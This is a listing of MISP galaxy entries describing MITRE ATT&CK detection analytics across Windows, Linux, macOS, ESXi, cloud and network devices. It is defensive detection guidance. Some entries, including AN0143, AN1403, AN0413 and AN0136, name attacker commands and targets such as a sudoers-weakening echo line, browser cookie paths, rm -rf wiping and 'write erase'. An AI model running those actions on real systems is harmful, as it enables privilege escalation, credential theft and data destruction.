UUID 40066e48-f70c-4fbb-a2cf-d7a385171edb which can be used as unique global reference for Analytic 1820 - AN1820 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1820
mitre_platforms ['Android']

Analytic 1802 - AN1802

Mobile security products can often alert the user if their device is vulnerable to known exploits.

Internal MISP references

UUID a69cefd7-02e8-4840-a26e-2ea0b6a95812 which can be used as unique global reference for Analytic 1802 - AN1802 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1802
mitre_platforms ['Android']

Analytic 1209 - AN1209

Detection focuses on identifying abuse of LD_PRELOAD and related linker variables. Defender perspective: monitor unexpected setting or modification of LD_PRELOAD in shell initialization scripts or environment exports, file creation of suspicious shared libraries, and correlation of these modifications with anomalous process execution. Key signals include execve events with LD_PRELOAD defined, newly created .so files in user directories, and processes hooking libc functions exhibiting abnormal behavior.

Internal MISP references

UUID 048adb6e-49a1-463e-bc0d-0a9a543cf0ce which can be used as unique global reference for Analytic 1209 - AN1209 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1209
mitre_platforms ['Linux']

Analytic 0192 - AN0192

Phishing attempts targeting IdPs often manifest as anomalous login attempts from suspicious email invitations or fake SSO prompts. Detection correlates login flows, MFA bypass attempts, and anomalous geographic patterns following phishing email delivery.

Internal MISP references

UUID 09df0b88-e1ae-4a1e-86c4-8bb00e79baed which can be used as unique global reference for Analytic 0192 - AN0192 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0192
mitre_platforms ['Identity Provider']

Analytic 0219 - AN0219

Adversary sends crafted HTTP/S (or other service) input to an Internet-facing app (IIS/ASP.NET, API, device portal). Chain: (1) abnormal request patterns to public endpoint → (2) elevated 4xx/5xx or unusual methods/paths → (3) server process (w3wp.exe/other service) spawns shell/LOLbins or loads non-standard modules → (4) optional outbound callback from the host/container.

Internal MISP references

UUID 17290910-5b25-477a-a0c0-c2661ff2585e which can be used as unique global reference for Analytic 0219 - AN0219 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0219
mitre_platforms ['Windows']

Analytic 0291 - AN0291

Detects unauthorized changes to IAM authentication configurations such as disabling MFA, creating backdoor access keys, or altering trust policies. Correlates identity policy updates with unusual login behavior.

Internal MISP references

UUID 20b6d23a-d1cc-494c-ac67-e7358835c674 which can be used as unique global reference for Analytic 0291 - AN0291 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0291
mitre_platforms ['IaaS']

Analytic 1092 - AN1092

Detects suspicious gratuitous ARP responses or inconsistent IP-to-MAC mappings using auditd and packet capture. Behavioral focus is on unsolicited replies overriding legitimate ARP ownership.

Internal MISP references

UUID 5ee16525-5e86-4634-aa75-37468c4034c4 which can be used as unique global reference for Analytic 1092 - AN1092 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1092
mitre_platforms ['Linux']

Analytic 1290 - AN1290

Detects rogue DHCP server activity and anomalous DHCP OFFER/ACK messages assigning unexpected DNS or gateway values. Detection correlates DHCP server role changes, DHCP exhaustion warnings, and sudden network configuration changes across endpoints.

Internal MISP references

UUID 780021a3-d3e6-4c5b-a976-1c3715b990e2 which can be used as unique global reference for Analytic 1290 - AN1290 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1290
mitre_platforms ['Windows']

Analytic 0921 - AN0921

Tracks modification of executables or interpreter payloads (e.g., Mach-O, dylib) that mutate across runs, using scripting engines, JIT compilers, or side-loaded plugins.

Internal MISP references

UUID 8fba0b53-2aca-4cca-8856-714e0f05665b which can be used as unique global reference for Analytic 0921 - AN0921 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0921
mitre_platforms ['macOS']

Analytic 2019 - AN2019

Internet scanners may be used to look for patterns associated with malicious content designed to collect host hardware information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox) Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.

Internal MISP references

UUID 9ead155d-e99b-4cca-8ace-0a90d533e875 which can be used as unique global reference for Analytic 2019 - AN2019 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN2019
mitre_platforms ['PRE']

Analytic 1029 - AN1029

Detection of AppCert DLL abuse involves correlating registry modifications to the AppCertDLLs key with subsequent unexpected DLL load behavior during process creation events. Specifically, defenders can observe abnormal DLLs being loaded into standard Windows processes after changes to the 'AppCertDLLs' registry value. Monitoring CreateProcess-family API executions with injected DLLs and linking those DLLs back to recent registry edits is key to identifying misuse. This is often accompanied by elevated privileges and potential lateral movement or discovery behavior.

Internal MISP references

UUID abe61118-51b2-45ad-93bc-9215dad25b25 which can be used as unique global reference for Analytic 1029 - AN1029 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1029
mitre_platforms ['Windows']

Analytic 0129 - AN0129

Execution of scripts or binaries that check for virtualization indicators (e.g., system_profiler, ioreg -l, kextstat), combined with delay functions or anomalous launchd activity.

Internal MISP references

UUID b12639b9-5daa-46aa-a21f-521f6962f042 which can be used as unique global reference for Analytic 0129 - AN0129 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0129
mitre_platforms ['macOS']

Analytic 0912 - AN0912

Direct execution of /bin/vmx or presence of rogue .vmx files not registered in vCenter inventory. Defender perspective: anomalous commands in shell history, edits to rc.local.d/local.sh for persistence.

Internal MISP references

UUID d677a72d-db0e-4332-a467-95b19836ef16 which can be used as unique global reference for Analytic 0912 - AN0912 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0912
mitre_platforms ['ESXi']

Analytic 0313 - AN0313

Monitoring for modification and execution of login hook scripts or LaunchAgents/LaunchDaemons used for persistence.

Internal MISP references

UUID 3b218f49-59ce-44a5-a10b-889c99e78934 which can be used as unique global reference for Analytic 0313 - AN0313 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0313
mitre_platforms ['macOS']

Analytic 1330 - AN1330

Internal user account accesses shared links outside the organization, followed by mass file download.

Internal MISP references

UUID 4eca5ae6-797c-41cb-bacd-dc7a6da58fb0 which can be used as unique global reference for Analytic 1330 - AN1330 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1330
mitre_platforms ['Office Suite']

Analytic 1033 - AN1033

Detects adversary behavior where a file with a benign-looking first extension (e.g., .txt, .jpg) ends with a dangerous second extension (e.g., .exe, .scr), and is subsequently executed. The behavior chain includes file creation with misleading naming and user or system-initiated process execution from the disguised file.

Internal MISP references

UUID 6eab694d-ea06-4487-99c4-0e21279530e8 which can be used as unique global reference for Analytic 1033 - AN1033 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1033
mitre_platforms ['Windows']

Analytic 1303 - AN1303

Detects suspicious registration of new password filter DLLs into the authentication process. Correlates registry modifications to LSASS Notification Packages with subsequent DLL creation and loading events. Observes anomalous file placement of DLLs in system directories followed by LSASS loading the new filter during logon/password change activity.

Internal MISP references

UUID 9fb6bb78-418a-483f-ae23-518ffde414d1 which can be used as unique global reference for Analytic 1303 - AN1303 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1303
mitre_platforms ['Windows']

Analytic 0331 - AN0331

Detects execution of image viewers or PowerShell scripts accessing or decoding files with mismatched MIME headers or embedded script-like byte patterns; often correlated with suspicious parent-child process lineage and outbound connections.

Internal MISP references

UUID a7666a4d-ece8-4e5b-ae85-d2987f14b950 which can be used as unique global reference for Analytic 0331 - AN0331 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0331
mitre_platforms ['Windows']

Analytic 0133 - AN0133

Detects attempts to clear RDP/network history and modify network configuration artifacts through command execution, registry key deletion, firewall rule changes, and suspicious file deletions (e.g., Default.rdp, registry edits to Terminal Server Client keys).

Internal MISP references

UUID d71c4839-8d23-41f4-b59a-8bd2c3517d1e which can be used as unique global reference for Analytic 0133 - AN0133 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0133
mitre_platforms ['Windows']

Analytic 0134 - AN0134

Detects deletion or overwriting of logs/configs that store SSH or proxy activity, such as /var/log/auth.log or custom .bash_history clearing tied to SSH sessions or firewall rule changes.

Internal MISP references

UUID 0bd02555-3b54-4425-84c8-118b95857df1 which can be used as unique global reference for Analytic 0134 - AN0134 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0134
mitre_platforms ['Linux']

Analytic 0314 - AN0314

Detection of modification to ESXi rc.local.d or rc scripts that are executed at boot.

Internal MISP references

UUID 32199f21-430f-4c91-b2d7-a0b7409cd5f0 which can be used as unique global reference for Analytic 0314 - AN0314 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0314
mitre_platforms ['ESXi']

Analytic 1430 - AN1430

Detects launch of command-line interpreters via Terminal, Automator, or hidden osascript, especially when parent process lineage deviates from user-initiated applications.

Internal MISP references

UUID 4a32d0e6-9486-4bbb-8807-7f913f96f448 which can be used as unique global reference for Analytic 1430 - AN1430 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1430
mitre_platforms ['macOS']

Analytic 1034 - AN1034

Correlates Group Policy updates that configure network logon scripts with subsequent remote file execution behaviors triggered by user logons to identify potential persistence or execution chains tied to adversarial manipulation of logon scripts.

Internal MISP references

UUID 53dd199d-4f38-4f12-83dd-f2d471d58a1b which can be used as unique global reference for Analytic 1034 - AN1034 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1034
mitre_platforms ['Windows']

Analytic 0413 - AN0413

File destruction via rm -rf, or overwriting with dd or srm, often executed by a script in /tmp or /private/tmp; may also involve overwriting files with political or decoy image data.

Internal MISP references

UUID 5e1b310a-ce3d-4271-83e0-87cd2862f959 which can be used as unique global reference for Analytic 0413 - AN0413 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0413
mitre_platforms ['macOS']

Analytic 0143 - AN0143

Detect sudo activity with NOPASSWD in /etc/sudoers or disabling tty_tickets, followed by immediate privileged commands (e.g., echo 'Defaults !tty_tickets' >> /etc/sudoers).

Internal MISP references

UUID 8825b589-3a6a-483a-9fc0-a4d00b1183ab which can be used as unique global reference for Analytic 0143 - AN0143 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0143
mitre_platforms ['macOS']

Analytic 1403 - AN1403

Detects access to known browser cookie files (e.g., ~/.mozilla/firefox/*.default/cookies.sqlite, ~/.config/google-chrome/) and suspicious reads of browser memory via /proc/[pid]/mem or ptrace.

Internal MISP references

UUID 9bcedfe7-c851-418a-b709-dd8883c7fc5e which can be used as unique global reference for Analytic 1403 - AN1403 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1403
mitre_platforms ['Linux']

Analytic 0431 - AN0431

A process (often spawned by a shell, interpreter, or malware implant) executes time discovery via commands (date, timedatectl, hwclock, cat /etc/timezone, /proc/uptime) or direct syscalls (time(), clock_gettime) and is (optionally) followed by scheduled task creation/modification (crontab, at) or conditional sleep logic.

Internal MISP references

UUID 9f2278c6-2e45-42fb-a1f9-00f02d496c53 which can be used as unique global reference for Analytic 0431 - AN0431 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0431
mitre_platforms ['Linux']

Analytic 1043 - AN1043

Execution of esxcli commands to enumerate datastore, configuration files, or directory structures by unauthorized or remote users.

Internal MISP references

UUID aaddc766-52bb-428b-98c4-3a742d10befa which can be used as unique global reference for Analytic 1043 - AN1043 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1043
mitre_platforms ['ESXi']

Analytic 0341 - AN0341

Behavioral correlation of privileged registry key creation under the W32Time TimeProviders path combined with a new DLL written to disk and potential process activity by LocalService. Indicates abuse of Time Providers for persistence.

Internal MISP references

UUID c223f997-8323-40c2-98c9-38a8a1779db4 which can be used as unique global reference for Analytic 0341 - AN0341 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0341
mitre_platforms ['Windows']

Analytic 1340 - AN1340

Authentication failure logs on routers/switches showing repeated use of default or common passwords across multiple accounts.

Internal MISP references

UUID c35bd9de-acd9-41f9-9e4f-2a3aad461de6 which can be used as unique global reference for Analytic 1340 - AN1340 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1340
mitre_platforms ['Network Devices']

Analytic 1304 - AN1304

Correlate the creation or modification of containers using restart policies (e.g., 'always') or DaemonSets with elevated host access, service account misuse, or privileged container contexts. Watch for manipulation of systemd units involving containers or pod scheduling targeting specific nodes or namespaces.

Internal MISP references

UUID de64bfbd-a6ed-4674-b0c5-dd485cba943b which can be used as unique global reference for Analytic 1304 - AN1304 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1304
mitre_platforms ['Containers']

Analytic 1503 - AN1503

Detects anomalous authentication activity such as sign-ins from impossible geolocations or legacy protocols from high-privileged accounts.

Internal MISP references

UUID 02571f27-8fa6-47cb-9097-0b84016a1dda which can be used as unique global reference for Analytic 1503 - AN1503 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1503
mitre_platforms ['Identity Provider']

Analytic 1305 - AN1305

Windows-specific environmental keying behavioral chain: (1) Rapid system information discovery through multiple techniques (WMI queries, registry enumeration, network share discovery, hostname/domain checks), (2) Target validation through specific environmental artifact collection (AD domain membership, network topology, installed software versions), (3) Cryptographic operation correlation indicating payload decryption based on collected environmental values, (4) Subsequent malicious code execution following successful environmental validation, (5) Temporal clustering of discovery activities suggesting automated environmental assessment.

Internal MISP references

UUID 1fd68bec-86cb-4457-b0cd-56fc724fd578 which can be used as unique global reference for Analytic 1305 - AN1305 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1305
mitre_platforms ['Windows']

Analytic 0531 - AN0531

Automated execution of native utilities and scripts to discover, enumerate, and exfiltrate files and clipboard content. Focus is on detecting repeated file access, scripting engine use, and use of command-line utilities commonly leveraged by collection scripts.

Internal MISP references

UUID 29433de9-360e-4189-9f6d-fb00c9a57e41 which can be used as unique global reference for Analytic 0531 - AN0531 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0531
mitre_platforms ['Windows']

Analytic 0351 - AN0351

Insertion of public keys into authorized_keys using bash/zsh or editor tools, correlated with suspicious process ancestry.

Internal MISP references

UUID 29988e3f-2f65-4fe5-9bf7-dae0cb869fc6 which can be used as unique global reference for Analytic 0351 - AN0351 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0351
mitre_platforms ['macOS']

Analytic 0315 - AN0315

Detection of changes to device startup-config files that include boot scripts or scheduled execution routines.

Internal MISP references

UUID 416b5616-a16d-4ccc-b214-5873f96e5b1f which can be used as unique global reference for Analytic 0315 - AN0315 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0315
mitre_platforms ['Network Devices']

Analytic 0513 - AN0513

Process or script enumerates network shares via CLI (net view/net share, PowerShell Get-SmbShare/WMI) or OS APIs (NetShareEnum/srvsvc.NetShareEnumAll RPC) → bursts of outbound SMB/RPC connections (445/139, \\host\IPC$ / srvsvc) to many hosts inside a short window → optional follow-on file listing or copy operations.

Internal MISP references

UUID 8a2537c3-9e9a-482d-81e2-281f88cf8878 which can be used as unique global reference for Analytic 0513 - AN0513 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0513
mitre_platforms ['Windows']

Analytic 1035 - AN1035

Detects tampered hardware or firmware via anomalous host status telemetry. Behavioral chain: (1) Pre-OS or firmware components exhibit unexpected version changes, signature failures, or modified boot paths; (2) System management/firmware tools log hardware inventory drift; (3) Sensor health telemetry or boot attestation events fail baseline checks; (4) Follow-on process execution from altered firmware or unknown drivers after boot.

Internal MISP references

UUID 8ba8d516-486a-4347-9a48-56a312e83897 which can be used as unique global reference for Analytic 1035 - AN1035 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1035
mitre_platforms ['Windows']

Analytic 0153 - AN0153

Detection of unauthorized modifications to Windows root certificate stores by monitoring registry keys, certificate installation processes, and creation of new certificate entries not in baseline trusted lists.

Internal MISP references

UUID a65545d7-fa1b-4d6f-b19c-fa03862c6210 which can be used as unique global reference for Analytic 0153 - AN0153 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0153
mitre_platforms ['Windows']

Analytic 1350 - AN1350

Behavioral chain: (1) delegated administration offers/relationships created or modified by partner tenants; (2) mailbox delegation/impersonation enabled; (3) follow-on access from partner IPs.

Internal MISP references

UUID b5985d46-1d54-4a6d-81c8-0b577b5d8d17 which can be used as unique global reference for Analytic 1350 - AN1350 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1350
mitre_platforms ['Office Suite']

Analytic 0135 - AN0135

Detects removal of Remote Login or Screen Sharing logs in Unified Logging, deletion of com.apple.UTun, or suspicious Terminal use of rm, sudo pfctl -F all to clear network state/config history.

Internal MISP references

UUID d01951d8-aae8-48b6-afd3-68c86fc167b1 which can be used as unique global reference for Analytic 0135 - AN0135 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0135
mitre_platforms ['macOS']

Analytic 1530 - AN1530

Monitors for anomalous binary files written to disk with padded size and subsequent execution by user or service context.

Internal MISP references

UUID d27caeb7-7af2-4a55-9dcb-734730c0ccf1 which can be used as unique global reference for Analytic 1530 - AN1530 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1530
mitre_platforms ['macOS']

Analytic 1053 - AN1053

Correlate creation or modification of serverless functions (e.g., AWS Lambda, GCP Cloud Functions, Azure Functions) with anomalous IAM role assignments or permissions escalation events. Detect subsequent executions of newly created functions that perform unexpected actions such as spawning outbound network connections, accessing sensitive resources, or creating additional credentials.

Internal MISP references

UUID ecf190d1-5311-466f-a361-a33820b3c7b7 which can be used as unique global reference for Analytic 1053 - AN1053 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1053
mitre_platforms ['IaaS']

Analytic 0613 - AN0613

Detection of Linux container escape attempts via syscalls (unshare, keyctl, mount) or process execution outside container namespaces. Defenders may correlate unusual system calls from containerized processes with subsequent process creation on the host or modification of host resources.

Internal MISP references

UUID 0021ecae-778a-4726-aa66-1cf4ca01943e which can be used as unique global reference for Analytic 0613 - AN0613 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0613
mitre_platforms ['Linux']

Analytic 1063 - AN1063

Execution of unsigned kernel extensions (KEXTs), tampering with LaunchDaemons, or userspace hooks into system libraries.

Internal MISP references

UUID 0248d3dc-266e-45c3-89e4-4865f9174cfd which can be used as unique global reference for Analytic 1063 - AN1063 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1063
mitre_platforms ['macOS']

Analytic 1036 - AN1036

Monitors for hardware or firmware tampering by correlating system boot logs, hardware inventory changes, and secure boot/firmware verification failures. Behavioral chain: (1) UEFI/BIOS version drift; (2) secure boot disabled or signature verification errors; (3) unexpected modules or hardware devices enumerated at boot; (4) new device firmware images loaded from non-approved sources.

Internal MISP references

UUID 1c25310b-d8fa-472d-a10e-c327a8fba693 which can be used as unique global reference for Analytic 1036 - AN1036 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1036
mitre_platforms ['Linux']

Analytic 1360 - AN1360

Defenders may observe attempts to disable dedicated crypto hardware on network devices, often visible through anomalous CLI commands, unexpected firmware or configuration updates, and degraded encryption performance. Suspicious indicators include commands that alter hardware acceleration settings (e.g., disabling AES-NI or crypto engines), modification of system image files, or logs showing fallback from hardware to software encryption. Network traffic analysis may also reveal a sudden downgrade in throughput or cipher negotiation behavior consistent with the absence of hardware acceleration.

Internal MISP references

UUID 1dd7c76f-ff71-4597-8785-f7a730101a00 which can be used as unique global reference for Analytic 1360 - AN1360 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1360
mitre_platforms ['Network Devices']

Analytic 0163 - AN0163

Detect unauthorized manipulation of log files, database entries, or system configuration files through auditd and syslog. Correlate shell commands that alter HISTFILE or data-related processes with abnormal file access patterns.

Internal MISP references

UUID 2e700f3b-bf9c-427c-a099-b80d233c1ccb which can be used as unique global reference for Analytic 0163 - AN0163 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0163
mitre_platforms ['Linux']

Analytic 0136 - AN0136

Detects firewall rule modifications or reset of logs/connection tables (e.g., clear logging, erase startup-config, write erase) following remote access activity on routers, switches, or VPN appliances.

Internal MISP references

UUID 5258feec-def7-43e0-bbe9-459ba53d3e28 which can be used as unique global reference for Analytic 0136 - AN0136 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0136
mitre_platforms ['Network Devices']

Analytic 0316 - AN0316

Detects AS-REP roasting attempts by monitoring for Kerberos AS-REQ/AS-REP authentication patterns where preauthentication is disabled (Event ID 4768 with Pre-Auth Type 0). Correlates these requests with subsequent service ticket activity (Event ID 4769) and anomalies such as requests using weak RC4 encryption (etype 0x17). Excessive enumeration of accounts with 'Do not require Kerberos preauthentication' set in Active Directory is another key detection point.

Internal MISP references

UUID 7687688c-f91c-4487-948e-1d5b372fcdac which can be used as unique global reference for Analytic 0316 - AN0316 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0316
mitre_platforms ['Windows']

Analytic 0361 - AN0361

Suspicious invocation of GUI utilities or scripts with suppressed or redirected windowing options. Defender view: detection of X11 or Wayland calls to spawn windows that do not appear on active displays, or use of nohup/screen/tmux to mask interactive shells.

Internal MISP references

UUID 7ef0d746-f233-4b41-b999-43a6b1484574 which can be used as unique global reference for Analytic 0361 - AN0361 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0361
mitre_platforms ['Linux']

Analytic 1603 - AN1603

Detection of unauthorized changes to boot configurations pointing to TFTP servers, unusual firmware loads during netbooting, or suspicious TFTP traffic. Correlation of boot config modifications, command history logs, and unexpected system image hashes provides detection coverage for adversaries attempting to persist via malicious TFTP boot images.

Internal MISP references

UUID 92004715-82f0-409d-a520-fc49720e4f3d which can be used as unique global reference for Analytic 1603 - AN1603 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1603
mitre_platforms ['Network Devices']

Analytic 1306 - AN1306

Linux environmental keying behavioral chain: (1) System information gathering through native commands (uname, hostname, id, whoami, ifconfig/ip) and file system enumeration, (2) Network configuration discovery (route tables, DNS settings, network interfaces), (3) Filesystem and mount point analysis for target-specific directories or devices, (4) Process and service enumeration to identify target-specific software, (5) Cryptographic library usage correlation with collected environmental data, (6) Payload execution following successful environmental validation.

Internal MISP references

UUID c24eb4e0-f23a-4d93-b2e0-7f5e7cae44f6 which can be used as unique global reference for Analytic 1306 - AN1306 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1306
mitre_platforms ['Linux']

Analytic 1630 - AN1630

Defenders may observe adversary attempts to extract configuration data from management repositories by monitoring for anomalous SNMP queries, API calls, or protocol requests (e.g., NETCONF, RESTCONF) that enumerate system configuration. Suspicious sequences include repeated queries from untrusted IPs, abnormal query types requesting sensitive configuration data, or repository access occurring outside of normal administrative maintenance windows. Abnormal authentication attempts, sudden enumeration of device inventory, or bulk data transfer of configuration files may also be observed.

Internal MISP references

UUID c5544183-4868-4a5c-ad8c-8a9359358298 which can be used as unique global reference for Analytic 1630 - AN1630 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1630
mitre_platforms ['Network Devices']

Analytic 0631 - AN0631

Detects when a script or binary is named with misleading or benign-looking extensions (.jpg, .doc) and is then executed via command line or a scheduled task. Includes ELF header mismatches and content-type inconsistencies on disk.

Internal MISP references

UUID e9ba7101-369f-48c6-8e6d-075ddd5744ba which can be used as unique global reference for Analytic 0631 - AN0631 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0631
mitre_platforms ['Linux']

Analytic 1037 - AN1037

Detects tampered Mac hardware/firmware by analyzing unified logs, EndpointSecurity events, and Apple Mobile File Integrity (AMFI) checks. Behavioral chain: (1) Boot process reports firmware signature mismatch; (2) Secure Boot policy altered; (3) new EFI drivers or hardware devices appear in inventory; (4) system extension loads from unapproved developer IDs post-boot.

Internal MISP references

UUID 0834f268-5810-4a90-8ef6-279dc0482471 which can be used as unique global reference for Analytic 1037 - AN1037 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1037
mitre_platforms ['macOS']

Analytic 0731 - AN0731

Analyze ESXi syslogs for management agents or VMs making outbound connections to dynamically calculated ports derived from DNS responses. Cross-check with VM traffic baselines to identify anomalies.

Internal MISP references

UUID 18c20664-b820-4a14-a7bf-5a75ac2fae92 which can be used as unique global reference for Analytic 0731 - AN0731 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0731
mitre_platforms ['ESXi']

Analytic 0371 - AN0371

Detects outbound traffic from hostd/vpxa or guest VM interfaces using unauthorized protocols such as FTP, HTTP POST bursts, or long-lived DNS tunnels.

Internal MISP references

UUID 3810988a-78be-4628-a9a5-500020f9c075 which can be used as unique global reference for Analytic 0371 - AN0371 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0371
mitre_platforms ['ESXi']

Analytic 0137 - AN0137

An adversary writes or drops a malicious Office Add-in (e.g., WLL, XLL, COM) to a trusted directory or modifies registry keys to load malicious add-ins on Office application launch. Upon user opening Word or Excel, the add-in is automatically loaded, triggering execution of the payload, often spawning scripting engines or anomalous child processes.

Internal MISP references

UUID 7263a8a8-a06f-4bdc-a021-3529ad683f9d which can be used as unique global reference for Analytic 0137 - AN0137 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0137
mitre_platforms ['Windows']

Analytic 0317 - AN0317

Detects attempts to enumerate local groups via Net.exe, PowerShell, or native API calls that precede lateral movement or privilege abuse.

Internal MISP references

UUID 78f4f0fe-55ef-4598-85ac-865cba1920d3 which can be used as unique global reference for Analytic 0317 - AN0317 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0317
mitre_platforms ['Windows']

Analytic 1307 - AN1307

macOS environmental keying behavioral chain: (1) System information discovery through native utilities (system_profiler, sw_vers, hostname, dscl) and Security framework queries, (2) Hardware and software enumeration including serial numbers, installed applications, and system versions, (3) Network configuration assessment (networksetup, scutil) and wireless network discovery, (4) Keychain and security context validation, (5) Unified Logs correlation with cryptographic framework usage (CommonCrypto, Security.framework), (6) Application bundle execution following environmental validation.

Internal MISP references

UUID 8cd02c43-f3f5-4623-a816-cefe1f586288 which can be used as unique global reference for Analytic 1307 - AN1307 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1307
mitre_platforms ['macOS']

Analytic 0173 - AN0173

Detects native Python or framework-based execution from Terminal, embedded apps, or launchd jobs. Flags network calls, persistence writes, or system enumeration after Python launch.

Internal MISP references

UUID bcac4672-778d-4b35-8b75-eaaf84b91853 which can be used as unique global reference for Analytic 0173 - AN0173 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0173
mitre_platforms ['macOS']

Analytic 1370 - AN1370

Detection of adversaries attempting to stop or disable host-based security agents by killing daemons, unloading kernel modules, or modifying init/systemd service configurations.

Internal MISP references

UUID bda03bab-3f0b-4bd0-8a8f-77bcb2b1ee7d which can be used as unique global reference for Analytic 1370 - AN1370 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1370
mitre_platforms ['Linux']

Analytic 1073 - AN1073

Collection of device configuration via CLI commands (e.g., show running-config, copy flash, more), often followed by TFTP/SCP transfers.

Internal MISP references

UUID dfe1b67a-a1c1-43f4-a043-5784a315d018 which can be used as unique global reference for Analytic 1073 - AN1073 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1073
mitre_platforms ['Network Devices']

Analytic 0713 - AN0713

Defender observes unauthorized modification or creation of Python hook files such as .pth, sitecustomize.py, or usercustomize.py in Python site-packages, dist-packages, or user paths. This is often correlated with subsequent unexpected interpreter execution (e.g., python3 running without user interaction), changes in interpreter behavior (e.g., malicious imports), and outbound connections initiated from Python. Defender links write/modify actions on hook files with execve of python process and/or anomalous child process or network activity.

Internal MISP references

UUID e32ce63a-7c82-4115-8c50-e43113562132 which can be used as unique global reference for Analytic 0713 - AN0713 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0713
mitre_platforms ['Linux']

Analytic 1703 - AN1703

Application vetting services could look for misuse of dynamic libraries.

Internal MISP references

UUID 63e33566-c46c-45b8-acf1-247327b827e1 which can be used as unique global reference for Analytic 1703 - AN1703 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1703
mitre_platforms ['Android']

Analytic 1730 - AN1730

This behavior is seamless to the user and is typically undetectable.

Internal MISP references

